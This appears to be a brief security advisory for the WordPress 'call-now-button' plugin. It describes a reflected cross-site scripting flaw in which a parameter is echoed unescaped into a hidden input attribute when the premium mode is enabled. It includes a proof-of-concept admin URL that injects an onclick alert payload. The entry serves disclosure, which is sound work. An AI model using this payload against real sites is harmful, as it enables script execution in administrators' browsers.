The plugin does not escape a parameter before outputting it back in an attribute of a hidden input, leading to a Reflected Cross-Site Scripting when the premium is enabled
With premium enabled: http://example.com/wp-admin/admin.php?page=call-now-button&bid;=xxxxx" accesskey=X onclick=alert(/XSS/) test="